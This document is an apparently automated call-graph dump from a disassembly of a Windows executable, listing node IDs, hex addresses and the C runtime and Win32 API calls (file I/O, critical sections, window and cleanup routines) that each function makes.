422b8a 27502->27504 27503 422b59 27618 417f25 10 API calls __filbuf 27503->27618 27510 422400 27504->27510 27507 422ba4 27619 422bcb LeaveCriticalSection __unlock_fhandle 27507->27619 27509 422b63 __write 27509->27491 27511 422427 27510->27511 27512 414021 __tsopen_nolock 46 API calls 27511->27512 27519 422443 27512->27519 27513 4226b2 27514 417ed3 __invoke_watson 10 API calls 27513->27514 27516 422b34 __write 27514->27516 27515 422482 27517 417f8a __write 46 API calls 27515->27517 27518 422b54 27516->27518 27524 422b8a 27516->27524 27520 422487 27517->27520 27521 417f77 __filbuf 46 API calls 27518->27521 27519->27513 27519->27515 27526 4224dd 27519->27526 27522 417f77 __filbuf 46 API calls 27520->27522 27523 422b59 27521->27523 27525 422491 27522->27525 27527 417f25 __filbuf 10 API calls 27523->27527 27529 422400 __tsopen_nolock 100 API calls 27524->27529 27530 417f25 __filbuf 10 API calls 27525->27530 27528 422564 27526->27528 27537 422537 27526->27537 27536 422b63 __write 27527->27536 27531 417f8a __write 46 API calls 27528->27531 27532 422ba4 27529->27532 27542 42249b 27530->27542 27533 422569 27531->27533 27534 422bcb __wsopen_helper LeaveCriticalSection 27532->27534 27535 417f77 __filbuf 46 API calls 27533->27535 27534->27536 27538 422573 27535->27538 27536->27507 27540 41af1c __alloc_osfhnd 51 API calls 27537->27540 27539 417f25 __filbuf 10 API calls 27538->27539 27539->27542 27541 4225f5 27540->27541 27543 4225fe 27541->27543 27544 42261f CreateFileW 27541->27544 27542->27507 27545 417f8a __write 46 API calls 27543->27545 27546 4226bc GetFileType 27544->27546 27547 42264c 27544->27547 27548 422603 27545->27548 27549 4226c9 GetLastError 27546->27549 27550 42270d 27546->27550 27551 422685 GetLastError 27547->27551 27554 422660 CreateFileW 27547->27554 27552 417f77 __filbuf 46 API calls 27548->27552 27553 417f9d __dosmaperr 46 API calls 27549->27553 27561 41ace6 __set_osfhnd 47 API calls 27550->27561 27555 417f9d __dosmaperr 46 API calls 27551->27555 27556 42260d 27552->27556 27557 4226f2 CloseHandle 27553->27557 27554->27546 27554->27551 27558 4226ac 27555->27558 27559 417f77 __filbuf 46 API calls 27556->27559 27557->27558 27560 422700 27557->27560 27562 417f77 __filbuf 46 API calls 27558->27562 27559->27542 27563 417f77 __filbuf 46 API calls 27560->27563 27566 42272b 27561->27566 27562->27513 27564 422705 27563->27564 27564->27558 27565 422942 27565->27513 27568 422aaa CloseHandle CreateFileW 27565->27568 27566->27565 27567 41e17f __lseek_nolock 48 API calls 27566->27567 27570 422799 27566->27570 27569 42278b 27567->27569 27571 422ad7 GetLastError 27568->27571 27572 422b05 27568->27572 27573 422794 27569->27573 27574 4227ad 27569->27574 27570->27565 27579 42294b 27570->27579 27582 4227a1 27570->27582 27591 42289b 27570->27591 27575 417f9d __dosmaperr 46 API calls 27571->27575 27572->27513 27576 417f8a __write 46 API calls 27573->27576 27577 41da15 __read_nolock 56 API calls 27574->27577 27578 422ae3 27575->27578 27576->27570 27580 4227be 27577->27580 27581 41ad67 __free_osfhnd 47 API calls 27578->27581 27579->27565 27590 422968 27579->27590 27595 4228bf 27579->27595 27584 4227df 27580->27584 27588 4227cc 27580->27588 27581->27572 27587 41d762 __close_nolock 49 API calls 27582->27587 27583 422913 27586 41da15 __read_nolock 56 API calls 27583->27586 27585 41e17f __lseek_nolock 48 API calls 27584->27585 27585->27570 27603 422920 27586->27603 27587->27558 27589 4238da __chsize_nolock 80 API calls 27588->27589 27592 4227d8 27589->27592 27593 420494 __lseeki64_nolock 48 API calls 27590->27593 27591->27565 27591->27583 27591->27595 27596 4228ea 27591->27596 27592->27582 27592->27584 27594 422973 27593->27594 27594->27595 27598 42297e 27594->27598 27595->27565 27595->27582 27599 41b7b2 __write 77 API calls 27595->27599 27597 420494 __lseeki64_nolock 48 API calls 27596->27597 27605 4228f5 27597->27605 27606 420494 __lseeki64_nolock 48 API calls 27598->27606 27599->27595 27600 4229c3 27602 4229e5 27600->27602 27604 4229ca 27600->27604 27601 4229a9 27608 41d762 __close_nolock 49 API calls 27601->27608 27607 41e17f __lseek_nolock 48 API calls 27602->27607 27603->27565 27603->27582 27603->27600 27603->27601 27603->27602 27609 41e17f __lseek_nolock 48 API calls 27604->27609 27605->27595 27610 4228fc 27605->27610 27611 422988 27606->27611 27613 42298d 27607->27613 27612 4229b0 27608->27612 27609->27613 27614 420494 __lseeki64_nolock 48 API calls 27610->27614 27611->27613 27615 417f77 __filbuf 46 API calls 27612->27615 27613->27565 27613->27582 27616 422906 27614->27616 27615->27513 27616->27582 27616->27583 27617->27503 27618->27509 27619->27509 27623 4150dd __write 27620->27623 27621 4150e9 27651 417f77 46 API calls __getptd_noexit 27621->27651 27623->27621 27624 41510f 27623->27624 27633 415471 27624->27633 27626 4150ee 27652 417f25 10 API calls __filbuf 27626->27652 27632 4150f9 __write 27632->27371 27634 415483 27633->27634 27635 4154a5 EnterCriticalSection 27633->27635 27634->27635 27636 41548b 27634->27636 27638 415117 27635->27638 27637 4182cb __lock 46 API calls 27636->27637 27637->27638 27639 415047 27638->27639 27640 415067 27639->27640 27641 415057 27639->27641 27646 415079 27640->27646 27654 414e4e 27640->27654 27709 417f77 46 API calls __getptd_noexit 27641->27709 27645 41505c 27653 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 27645->27653 27671 41443c 27646->27671 27649 4150b9 27684 41e1f4 27649->27684 27651->27626 27652->27632 27653->27632 27655 414e61 27654->27655 27656 414e79 27654->27656 27710 417f77 46 API calls __getptd_noexit 27655->27710 27657 414139 __filbuf 46 API calls 27656->27657 27659 414e80 27657->27659 27662 41e1f4 __write 51 API calls 27659->27662 27660 414e66 27711 417f25 10 API calls __filbuf 27660->27711 27663 414e97 27662->27663 27664 414f09 27663->27664 27666 414ec9 27663->27666 27670 414e71 27663->27670 27712 417f77 46 API calls __getptd_noexit 27664->27712 27667 41e1f4 __write 51 API calls 27666->27667 27666->27670 27668 414f64 27667->27668 27669 41e1f4 __write 51 API calls 27668->27669 27668->27670 27669->27670 27670->27646 27672 414477 27671->27672 27673 414455 27671->27673 27677 414139 27672->27677 27673->27672 27674 414139 __filbuf 46 API calls 27673->27674 27675 414470 27674->27675 27713 41b7b2 77 API calls 4 library calls 27675->27713 27678 414145 27677->27678 27679 41415a 27677->27679 27714 417f77 46 API calls __getptd_noexit 27678->27714 27679->27649 27681 41414a 27715 417f25 10 API calls __filbuf 27681->27715 27683 414155 27683->27649 27685 41e200 __write 27684->27685 27686 41e223 27685->27686 27687 41e208 27685->27687 27689 41e22f 27686->27689 27694 41e269 27686->27694 27736 417f8a 46 API calls __getptd_noexit 27687->27736 27738 417f8a 46 API calls __getptd_noexit 27689->27738 27690 41e20d 27737 417f77 46 API calls __getptd_noexit 27690->27737 27693 41e234 27739 417f77 46 API calls __getptd_noexit 27693->27739 27716 41ae56 27694->27716 27697 41e26f 27699 41e291 27697->27699 27700 41e27d 27697->27700 27698 41e23c 27740 417f25 10 API calls __filbuf 27698->27740 27741 417f77 46 API calls __getptd_noexit 27699->27741 27726 41e17f 27700->27726 27704 41e215 __write 27704->27645 27705 41e289 27743 41e2c0 LeaveCriticalSection __unlock_fhandle 27705->27743 27706 41e296 27742 417f8a 46 API calls __getptd_noexit 27706->27742 27709->27645 27710->27660 27711->27670 27712->27670 27713->27672 27714->27681 27715->27683 27717 41ae62 __write 27716->27717 27718 41aebc 27717->27718 27719 4182cb __lock 46 API calls 27717->27719 27720 41aec1 EnterCriticalSection 27718->27720 27721 41aede __write 27718->27721 27722 41ae8e 27719->27722 27720->27721 27721->27697 27723 41aeaa 27722->27723 27724 41ae97 InitializeCriticalSectionAndSpinCount 27722->27724 27744 41aeec LeaveCriticalSection _doexit 27723->27744 27724->27723 27745 41aded 27726->27745 27728 41e18e 27729 41e1a4 SetFilePointer 27728->27729 27730 41e194 27728->27730 27731 41e1c3 27729->27731 27732 41e1bb GetLastError 27729->27732 27758 417f77 46 API calls __getptd_noexit 27730->27758 27734 41e199 27731->27734 27759 417f9d 46 API calls 3 library calls 27731->27759 27732->27731 27734->27705 27736->27690 27737->27704 27738->27693 27739->27698 27740->27704 27741->27706 27742->27705 27743->27704 27744->27718 27746 41ae12 27745->27746 27747 41adfa 27745->27747 27749 417f8a __write 46 API calls 27746->27749 27752 41ae51 27746->27752 27748 417f8a __write 46 API calls 27747->27748 27750 41adff 27748->27750 27751 41ae23 27749->27751 27753 417f77 __filbuf 46 API calls 27750->27753 27754 417f77 __filbuf 46 API calls 27751->27754 27752->27728 27757 41ae07 27753->27757 27755 41ae2b 27754->27755 27756 417f25 __filbuf 10 API calls 27755->27756 27756->27757 27757->27728 27758->27734 27759->27734 27761 4149ea 27760->27761 27762 4149fe 27760->27762 27806 417f77 46 API calls __getptd_noexit 27761->27806 27765 41443c __flush 77 API calls 27762->27765 27768 4149fa 27762->27768 27764 4149ef 27807 417f25 10 API calls __filbuf 27764->27807 27767 414a0a 27765->27767 27779 41d8c2 27767->27779 27778 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 27768->27778 27771 414139 __filbuf 46 API calls 27772 414a18 27771->27772 27783 41d7fe 27772->27783 27774 414a1e 27774->27768 27775 413748 _free 46 API calls 27774->27775 27775->27768 27776->27380 27777->27384 27778->27384 27780 414a12 27779->27780 27781 41d8d2 27779->27781 27780->27771 27781->27780 27782 413748 _free 46 API calls 27781->27782 27782->27780 27784 41d80a __write 27783->27784 27785 41d812 27784->27785 27786 41d82d 27784->27786 27823 417f8a 46 API calls __getptd_noexit 27785->27823 27787 41d839 27786->27787 27792 41d873 27786->27792 27825 417f8a 46 API calls __getptd_noexit 27787->27825 27790 41d817 27824 417f77 46 API calls __getptd_noexit 27790->27824 27791 41d83e 27826 417f77 46 API calls __getptd_noexit 27791->27826 27795 41ae56 ___lock_fhandle 48 API calls 27792->27795 27797 41d879 27795->27797 27796 41d846 27827 417f25 10 API calls __filbuf 27796->27827 27799 41d893 27797->27799 27800 41d887 27797->27800 27828 417f77 46 API calls __getptd_noexit 27799->27828 27808 41d762 27800->27808 27802 41d81f __write 27802->27774 27804 41d88d 27829 41d8ba LeaveCriticalSection __unlock_fhandle 27804->27829 27806->27764 27807->27768 27809 41aded __lseeki64_nolock 46 API calls 27808->27809 27812 41d772 27809->27812 27810 41d7c8 27830 41ad67 47 API calls 2 library calls 27810->27830 27812->27810 27814 41aded __lseeki64_nolock 46 API calls 27812->27814 27822 41d7a6 27812->27822 27813 41d7d0 27816 41d7f2 27813->27816 27831 417f9d 46 API calls 3 library calls 27813->27831 27817 41d79d 27814->27817 27815 41aded __lseeki64_nolock 46 API calls 27818 41d7b2 FindCloseChangeNotification 27815->27818 27816->27804 27820 41aded __lseeki64_nolock 46 API calls 27817->27820 27818->27810 27821 41d7be GetLastError 27818->27821 27820->27822 27821->27810 27822->27810 27822->27815 27823->27790 27824->27802 27825->27791 27826->27796 27827->27802 27828->27804 27829->27802 27830->27813 27831->27816 27833 414c82 __write 27832->27833 27834 414cc3 27833->27834 27835 414cbb __write 27833->27835 27839 414c96 _memset 27833->27839 27836 415471 __lock_file 47 API calls 27834->27836 27835->27390 27838 414ccb 27836->27838 27845 414aba 27838->27845 27859 417f77 46 API calls __getptd_noexit 27839->27859 27840 414cb0 27860 417f25 10 API calls __filbuf 27840->27860 27846 414ad8 _memset 27845->27846 27851 414af2 27845->27851 27847 414ae2 27846->27847 27846->27851 27856 414b2d 27846->27856 27912 417f77 46 API calls __getptd_noexit 27847->27912 27849 414ae7 27913 417f25 10 API calls __filbuf 27849->27913 27861 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 27851->27861 27853 414c38 _memset 27915 417f77 46 API calls __getptd_noexit 27853->27915 27854 414139 __filbuf 46 API calls 27854->27856 27856->27851 27856->27853 27856->27854 27862 41dfcc 27856->27862 27892 41d8f3 27856->27892 27914 41e0c2 46 API calls 3 library calls 27856->27914 27859->27840 27860->27835 27861->27835 27863 41dfd8 __write 27862->27863 27864 41dfe0 27863->27864 27866 41dffb 27863->27866 27985 417f8a 46 API calls __getptd_noexit 27864->27985 27865 41e007 27987 417f8a 46 API calls __getptd_noexit 27865->27987 27866->27865 27871 41e041 27866->27871 27869 41dfe5 27986 417f77 46 API calls __getptd_noexit 27869->27986 27870 41e00c 27988 417f77 46 API calls __getptd_noexit 27870->27988 27874 41e063 27871->27874 27875 41e04e 27871->27875 27876 41ae56 ___lock_fhandle 48 API calls 27874->27876 27990 417f8a 46 API calls __getptd_noexit 27875->27990 27879 41e069 27876->27879 27877 41e014 27989 417f25 10 API calls __filbuf 27877->27989 27882 41e077 27879->27882 27883 41e08b 27879->27883 27880 41e053 27991 417f77 46 API calls __getptd_noexit 27880->27991 27881 41dfed __write 27881->27856 27916 41da15 27882->27916 27992 417f77 46 API calls __getptd_noexit 27883->27992 27888 41e083 27994 41e0ba LeaveCriticalSection __unlock_fhandle 27888->27994 27889 41e090 27993 417f8a 46 API calls __getptd_noexit 27889->27993 27893 41d900 27892->27893 27897 41d915 27892->27897 28018 417f77 46 API calls __getptd_noexit 27893->28018 27895 41d905 28019 417f25 10 API calls __filbuf 27895->28019 27898 41d94a 27897->27898 27903 41d910 27897->27903 28015 420603 27897->28015 27900 414139 __filbuf 46 API calls 27898->27900 27901 41d95e 27900->27901 27902 41dfcc __read 59 API calls 27901->27902 27904 41d965 27902->27904 27903->27856 27904->27903 27905 414139 __filbuf 46 API calls 27904->27905 27906 41d988 27905->27906 27906->27903 27907 414139 __filbuf 46 API calls 27906->27907 27908 41d994 27907->27908 27908->27903 27909 414139 __filbuf 46 API calls 27908->27909 27910 41d9a1 27909->27910 27911 414139 __filbuf 46 API calls 27910->27911 27911->27903 27912->27849 27913->27851 27914->27856 27915->27849 27917 41da31 27916->27917 27918 41da4c 27916->27918 27995 417f8a 46 API calls __getptd_noexit 27917->27995 27920 41da5b 27918->27920 27922 41da7a 27918->27922 27997 417f8a 46 API calls __getptd_noexit 27920->27997 27921 41da36 27996 417f77 46 API calls __getptd_noexit 27921->27996 27924 41da98 27922->27924 27938 41daac 27922->27938 28000 417f8a 46 API calls __getptd_noexit 27924->28000 27926 41da60 27998 417f77 46 API calls __getptd_noexit 27926->27998 27928 41db02 28002 417f8a 46 API calls __getptd_noexit 27928->28002 27931 41da9d 28001 417f77 46 API calls __getptd_noexit 27931->28001 27932 41da67 27999 417f25 10 API calls __filbuf 27932->27999 27933 41db07 28003 417f77 46 API calls __getptd_noexit 27933->28003 27937 41daa4 28004 417f25 10 API calls __filbuf 27937->28004 27938->27928 27939 41da3e 27938->27939 27940 41dae1 27938->27940 27941 41db1b 27938->27941 27939->27888 27940->27928 27947 41daec ReadFile 27940->27947 27944 416b04 __malloc_crt 46 API calls 27941->27944 27948 41db31 27944->27948 27945 41dc17 27946 41df8f GetLastError 27945->27946 27953 41dc2b 27945->27953 27949 41de16 27946->27949 27950 41df9c 27946->27950 27947->27945 27947->27946 27951 41db59 27948->27951 27952 41db3b 27948->27952 27964 41dd9b 27949->27964 28011 417f9d 46 API calls 3 library calls 27949->28011 28013 417f77 46 API calls __getptd_noexit 27950->28013 28007 420494 48 API calls 3 library calls 27951->28007 28005 417f77 46 API calls __getptd_noexit 27952->28005 27953->27964 27966 41de5b 27953->27966 27967 41dc47 27953->27967 27957 41db67 27957->27947 27958 41dfa1 28014 417f8a 46 API calls __getptd_noexit 27958->28014 27960 41db40 28006 417f8a 46 API calls __getptd_noexit 27960->28006 27963 413748 _free 46 API calls 27963->27939 27964->27939 27964->27963 27965 41ded0 ReadFile 27970 41deef GetLastError 27965->27970 27977 41def9 27965->27977 27966->27964 27966->27965 27968 41dcab ReadFile 27967->27968 27973 41dd28 27967->27973 27969 41dcc9 GetLastError 27968->27969 27976 41dcd3 27968->27976 27969->27967 27969->27976 27970->27966 27970->27977 27971 41ddec MultiByteToWideChar 27971->27964 27972 41de10 GetLastError 27971->27972 27972->27949 27973->27964 27974 41dda3 27973->27974 27975 41dd96 27973->27975 27979 41dd60 27973->27979 27974->27979 27980 41ddda 27974->27980 28009 417f77 46 API calls __getptd_noexit 27975->28009 27976->27967 28008 420494 48 API calls 3 library calls 27976->28008 27977->27966 28012 420494 48 API calls 3 library calls 27977->28012 27979->27971 28010 420494 48 API calls 3 library calls 27980->28010 27984 41dde9 27984->27971 27985->27869 27986->27881 27987->27870 27988->27877 27989->27881 27990->27880 27991->27877 27992->27889 27993->27888 27994->27881 27995->27921 27996->27939 27997->27926 27998->27932 27999->27939 28000->27931 28001->27937 28002->27933 28003->27937 28004->27939 28005->27960 28006->27939 28007->27957 28008->27976 28009->27964 28010->27984 28011->27964 28012->27977 28013->27958 28014->27964 28016 416b04 __malloc_crt 46 API calls 28015->28016 28017 420618 28016->28017 28017->27898 28018->27895 28019->27903 28023 4148b3 GetSystemTimeAsFileTime __aulldiv 28020->28023 28022 442c6b 28022->27393 28023->28022 28024->27400 28025->27406 28026->27406 28031 45272f __tzset_nolock _wcscpy 28027->28031 28028 4528a4 28028->27314 28028->27315 28029 414d04 61 API calls __fread_nolock 28029->28031 28030 44afef GetSystemTimeAsFileTime 28030->28031 28031->28028 28031->28029 28031->28030 28032 4150d1 81 API calls _fseek 28031->28032 28032->28031 28034 44b1bc 28033->28034 28035 44b1ca 28033->28035 28036 4149c2 116 API calls 28034->28036 28037 44b1e1 28035->28037 28038 4149c2 116 API calls 28035->28038 28039 44b1d8 28035->28039 28036->28035 28068 4321a4 28037->28068 28040 44b2db 28038->28040 28039->27341 28040->28037 28042 44b2e9 28040->28042 28046 44b2f6 28042->28046 28047 414a46 82 API calls 28042->28047 28043 44b224 28044 44b253 28043->28044 28045 44b228 28043->28045 28072 43213d 28044->28072 28049 414a46 82 API calls 28045->28049 28051 44b235 28045->28051 28046->27341 28047->28046 28049->28051 28050 44b25a 28053 44b260 28050->28053 28054 44b289 28050->28054 28052 414a46 82 API calls 28051->28052 28056 44b245 28051->28056 28052->28056 28057 44b26d 28053->28057 28060 414a46 82 API calls 28053->28060 28082 44b0bf 87 API calls 28054->28082 28056->27341 28058 44b27d 28057->28058 28061 414a46 82 API calls 28057->28061 28058->27341 28059 44b28f 28083 4320f8 46 API calls _free 28059->28083 28060->28057 28061->28058 28063 44b295 28064 44b2a2 28063->28064 28065 414a46 82 API calls 28063->28065 28066 44b2b2 28064->28066 28067 414a46 82 API calls 28064->28067 28065->28064 28066->27341 28067->28066 28069 4321cb 28068->28069 28071 4321b4 __tzset_nolock _memmove 28068->28071 28070 414d04 __fread_nolock 61 API calls 28069->28070 28070->28071 28071->28043 28073 4135bb _malloc 46 API calls 28072->28073 28074 432150 28073->28074 28075 4135bb _malloc 46 API calls 28074->28075 28076 432162 28075->28076 28077 4135bb _malloc 46 API calls 28076->28077 28078 432174 28077->28078 28081 432189 28078->28081 28084 4320f8 46 API calls _free 28078->28084 28080 432198 28080->28050 28081->28050 28082->28059 28083->28063 28084->28080 28085->27232 28086->27232 28087->27232 28088->27227 28089->27232 28090->27232 28091->27237 28092->27246 28093->27248 28094->27248 28095->27254 28145 410160 28096->28145 28098 41012f GetFullPathNameW 28099 410147 moneypunct 28098->28099 28099->27075 28101 4102cb SHGetDesktopFolder 28100->28101 28104 410333 _wcsncpy 28100->28104 28102 4102e0 _wcsncpy 28101->28102 28101->28104 28103 41031c SHGetPathFromIDListW 28102->28103 28102->28104 28103->28104 28104->27078 28106 4101bb 28105->28106 28107 425f4a 28105->28107 28108 410160 52 API calls 28106->28108 28109 4114ab __wcsicoll 58 API calls 28107->28109 28112 425f6e 28107->28112 28110 4101c7 28108->28110 28109->28107 28149 410200 52 API calls 2 library calls 28110->28149 28112->27080 28113 4101d6 28150 410200 52 API calls 2 library calls 28113->28150 28115 4101e9 28115->27080 28117 40f760 128 API calls 28116->28117 28118 40f584 28117->28118 28119 429335 28118->28119 28120 40f58c 28118->28120 28121 4528bd 118 API calls 28119->28121 28122 40f598 28120->28122 28123 429358 28120->28123 28125 42934b 28121->28125 28167 4033c0 113 API calls 7 library calls 28122->28167 28168 434034 86 API calls _wprintf 28123->28168 28128 429373 28125->28128 28129 42934f 28125->28129 28127 40f5b4 28127->27076 28132 4115d7 52 API calls 28128->28132 28131 431e58 82 API calls 28129->28131 28130 429369 28130->28128 28131->28123 28144 4293c5 moneypunct 28132->28144 28133 42959c 28134 413748 _free 46 API calls 28133->28134 28135 4295a5 28134->28135 28136 431e58 82 API calls 28135->28136 28137 4295b1 28136->28137 28138 402780 52 API calls 28138->28144 28141 401b10 52 API calls 28141->28144 28144->28133 28144->28138 28144->28141 28151 444af8 28144->28151 28154 44b41c 28144->28154 28161 4022d0 28144->28161 28169 44c7dd 64 API calls 3 library calls 28144->28169 28146 410167 _wcslen 28145->28146 28147 4115d7 52 API calls 28146->28147 28148 41017e _wcscpy 28147->28148 28148->28098 28149->28113 28150->28115 28152 4115d7 52 API calls 28151->28152 28153 444b27 _memmove 28152->28153 28153->28144 28155 44b429 28154->28155 28156 4115d7 52 API calls 28155->28156 28157 44b440 28156->28157 28158 44b45e 28157->28158 28159 401b10 52 API calls 28157->28159 28158->28144 28160 44b453 28159->28160 28160->28144 28162 4022e0 28161->28162 28164 40239d 28161->28164 28163 4115d7 52 API calls 28162->28163 28162->28164 28165 402320 moneypunct 28162->28165 28163->28165 28164->28144 28165->28164 28166 4115d7 52 API calls 28165->28166 28166->28165 28167->28127 28168->28130 28169->28144 28171 402417 28170->28171 28175 402539 moneypunct 28170->28175 28172 4115d7 52 API calls 28171->28172 28171->28175 28174 402443 28172->28174 28173 4115d7 52 API calls 28176 4024b4 28173->28176 28174->28173 28175->27084 28176->28175 28178 4022d0 52 API calls 28176->28178 28199 402880 95 API calls 2 library calls 28176->28199 28178->28176 28183 401566 28179->28183 28180 401794 28200 40e9a0 28180->28200 28183->28180 28184 4010a0 52 API calls 28183->28184 28185 40167a 28183->28185 28184->28183 28186 4017c0 28185->28186 28225 45e737 90 API calls 3 library calls 28185->28225 28186->27086 28188 40bc70 52 API calls 28187->28188 28197 40d451 28188->28197 28189 40d50f 28234 410600 52 API calls 28189->28234 28191 427c01 28235 45e737 90 API calls 3 library calls 28191->28235 28192 40e0a0 52 API calls 28192->28197 28194 40d519 28194->27089 28195 401b10 52 API calls 28195->28197 28197->28189 28197->28191 28197->28192 28197->28194 28197->28195 28232 40f310 53 API calls 28197->28232 28233 40d860 91 API calls 28197->28233 28199->28176 28201 40e9b2 28200->28201 28202 4276f1 28201->28202 28203 40e9ba 28201->28203 28226 45e737 90 API calls 3 library calls 28202->28226 28204 40e9c2 28203->28204 28205 42770c 28203->28205 28207 427724 28204->28207 28208 40e9ca 28204->28208 28227 45e737 90 API calls 3 library calls 28205->28227 28228 45e737 90 API calls 3 library calls 28207->28228 28211 40e9d2 28208->28211 28212 42773f 28208->28212 28209 427702 28209->28185 28215 42775a 28211->28215 28216 40e9da 28211->28216 28229 45e737 90 API calls 3 library calls 28212->28229 28213 42771a 28213->28185 28230 45e737 90 API calls 3 library calls 28215->28230 28221 40e9e3 28216->28221 28231 45e737 90 API calls 3 library calls 28216->28231 28217 427735 28217->28185 28219 427750 28219->28185 28221->28185 28222 42776b 28222->28185 28224 427783 28224->28185 28225->28185 28226->28209 28227->28213 28228->28217 28229->28219 28230->28222 28231->28224 28232->28197 28233->28197 28234->28194 28235->28194 28236->27102 28237->27103 28239 42c5fe 28238->28239 28253 4091c6 28238->28253 28240 40bc70 52 API calls 28239->28240 28239->28253 28241 42c64e InterlockedIncrement 28240->28241 28242 42c665 28241->28242 28247 42c697 28241->28247 28244 42c672 InterlockedDecrement Sleep InterlockedIncrement 28242->28244 28242->28247 28243 42c737 InterlockedDecrement 28245 42c74a 28243->28245 28244->28242 28244->28247 28248 408f40 VariantClear 28245->28248 28246 42c731 28246->28243 28247->28243 28247->28246 28342 408e80 VariantClear 28247->28342 28250 42c752 28248->28250 28348 410c60 VariantClear moneypunct 28250->28348 28251 42c6cf 28343 45340c 85 API calls 28251->28343 28253->27126 28255 42c6db 28256 402160 52 API calls 28255->28256 28257 42c6e5 28256->28257 28344 45340c 85 API calls 28257->28344 28259 42c6f1 28345 40d200 52 API calls 2 library calls 28259->28345 28261 42c6fb 28346 465124 53 API calls 28261->28346 28263 42c715 28264 42c76a 28263->28264 28265 42c719 28263->28265 28266 401b10 52 API calls 28264->28266 28347 46fe32 VariantClear 28265->28347 28268 42c77e 28266->28268 28269 401980 53 API calls 28268->28269 28275 42c796 28269->28275 28270 42c812 28350 46fe32 VariantClear 28270->28350 28272 42c82a InterlockedDecrement 28351 46ff07 54 API calls 28272->28351 28274 42c864 28352 45e737 90 API calls 3 library calls 28274->28352 28275->28270 28275->28274 28349 40ba10 52 API calls 2 library calls 28275->28349 28278 42c9ec 28354 47d33e 294 API calls 28278->28354 28280 42c9fe 28355 46feb1 VariantClear VariantClear 28280->28355 28282 42ca08 28284 401b10 52 API calls 28282->28284 28283 408f40 VariantClear 28292 42c849 28283->28292 28287 42ca15 28284->28287 28285 408f40 VariantClear 28288 42c891 28285->28288 28286 402780 52 API calls 28286->28292 28289 40c2c0 52 API calls 28287->28289 28353 410c60 VariantClear moneypunct 28288->28353 28294 42c874 28289->28294 28291 401980 53 API calls 28291->28292 28292->28278 28292->28283 28292->28286 28292->28291 28293 40a780 141 API calls 28292->28293 28293->28292 28294->28285 28295 42ca59 28294->28295 28295->28295 28297 40afc4 28296->28297 28298 40b156 28296->28298 28299 40afd5 28297->28299 28300 42d1e3 28297->28300 28356 45e737 90 API calls 3 library calls 28298->28356 28305 40a780 141 API calls 28299->28305 28321 40b11a moneypunct 28299->28321 28357 45e737 90 API calls 3 library calls 28300->28357 28303 42d1f8 28309 408f40 VariantClear 28303->28309 28304 40b143 28304->27126 28307 40b00a 28305->28307 28307->28303 28311 40b012 28307->28311 28308 42d4db 28308->28308 28309->28304 28310 40b04a 28320 40b05c moneypunct 28310->28320 28358 40e270 VariantClear moneypunct 28310->28358 28311->28310 28313 42d231 VariantClear 28311->28313 28314 40b094 moneypunct 28311->28314 28312 40b108 28312->28321 28359 40e270 VariantClear moneypunct 28312->28359 28313->28320 28314->28312 28317 42d425 moneypunct 28314->28317 28315 42d45a VariantClear 28315->28321 28317->28315 28317->28321 28318 4115d7 52 API calls 28318->28314 28320->28314 28320->28318 28321->28304 28360 45e737 90 API calls 3 library calls 28321->28360 28322->27126 28323->27126 28324->27126 28325->27126 28326->27126 28327->27126 28328->27126 28329->27126 28330->27126 28331->27150 28332->27150 28333->27150 28334->27150 28335->27150 28336->27150 28337->27150 28338->27150 28339->27150 28340->27126 28341->27110 28342->28251 28343->28255 28344->28259 28345->28261 28346->28263 28347->28246 28348->28253 28349->28275 28350->28272 28351->28292 28352->28294 28353->28253 28354->28280 28355->28282 28356->28300 28357->28303 28358->28320 28359->28321 28360->28308 28361 401cb0 28362 401cfb mciSendStringW 28361->28362 28363 426f4f DestroyWindow 28361->28363 28364 401d19 28362->28364 28369 426f5b 28362->28369 28363->28369 28365 401d26 28364->28365 28380 426f9b moneypunct 28364->28380 28367 401d33 28365->28367 28368 427007 28365->28368 28366 426f6b UnregisterHotKey 28366->28369 28370 401d40 28367->28370 28378 42702e 28367->28378 28372 42701c FreeLibrary 28368->28372 28368->28378 28369->28366 28369->28380 28371 408f40 VariantClear 28370->28371 28376 401d4e 28371->28376 28372->28368 28373 426fb7 28373->28380 28415 40da20 CloseHandle 28373->28415 28374 426fc9 FindClose 28374->28380 28375 427043 VirtualFree 28375->28378 28379 408f40 VariantClear 28376->28379 28378->28375 28384 427074 28378->28384 28388 401d65 28379->28388 28380->28368 28380->28373 28380->28374 28381 401dbf 28404 40e750 54 API calls 28381->28404 28383 401dc4 28383->28384 28387 408f40 VariantClear 28383->28387 28384->28384 28389 401dd6 28387->28389 28388->28381 28413 40d410 VariantClear 28388->28413 28414 40da90 VariantClear moneypunct 28388->28414 28405 4109a0 CloseHandle 28389->28405 28391 401dde 28406 401400 48 API calls moneypunct 28391->28406 28393 401df9 moneypunct 28407 4012f0 28393->28407 28395 401e21 28396 408f40 VariantClear 28395->28396 28397 401e34 moneypunct 28396->28397 28398 410aa0 VariantClear 28397->28398 28399 401eb3 28398->28399 28400 410a70 FreeLibrary 28399->28400 28401 401ebe 28400->28401 28402 40ddd0 WaitForSingleObject InternetCloseHandle InternetCloseHandle CloseHandle 28401->28402 28403 401f16 28402->28403 28404->28383 28405->28391 28406->28393 28408 4012f6 moneypunct 28407->28408 28416 401380 46 API calls 28408->28416 28410 401331 28417 401380 46 API calls 28410->28417 28412 401339 28413->28388 28414->28388 28415->28373 28416->28410 28417->28412 28666 410ab0 6 API calls 28667 435eb0 GetMenu OleSetMenuDescriptor 28668 447abc 116 API calls 28670 445cb9 67 API calls __wcsicoll 28671 441544 GetWindowLongW DestroyAcceleratorTable CreateAcceleratorTableW GetForegroundWindow 28673 447b4e GetWindowLongW PostMessageW PostMessageW DefDlgProcW 28675 445948 SendMessageTimeoutW EnumChildWindows 28676 43634e IsWindowEnabled 28678 418151 InitializeCriticalSectionAndSpinCount 28679 431d57 SendMessageW 28680 434355 VirtualFreeEx CloseHandle 28682 435f58 GetClientRect CopyRect 28418 40e360 28419 4115d7 52 API calls 28418->28419 28420 40e3ec GetModuleFileNameW 28419->28420 28434 413a0e 28420->28434 28422 40e421 _wcsncat 28437 413a9e 28422->28437 28425 4115d7 52 API calls 28426 40e45e _wcscpy 28425->28426 28427 40bc70 52 API calls 28426->28427 28428 40e498 28427->28428 28440 40e4c0 28428->28440 28430 40e4a9 28431 401c90 52 API calls 28433 40e4a1 _wcscat _wcslen _wcsncpy 28431->28433 28432 4115d7 52 API calls 28432->28433 28433->28430 28433->28431 28433->28432 28454 413801 28434->28454 28484 419efd 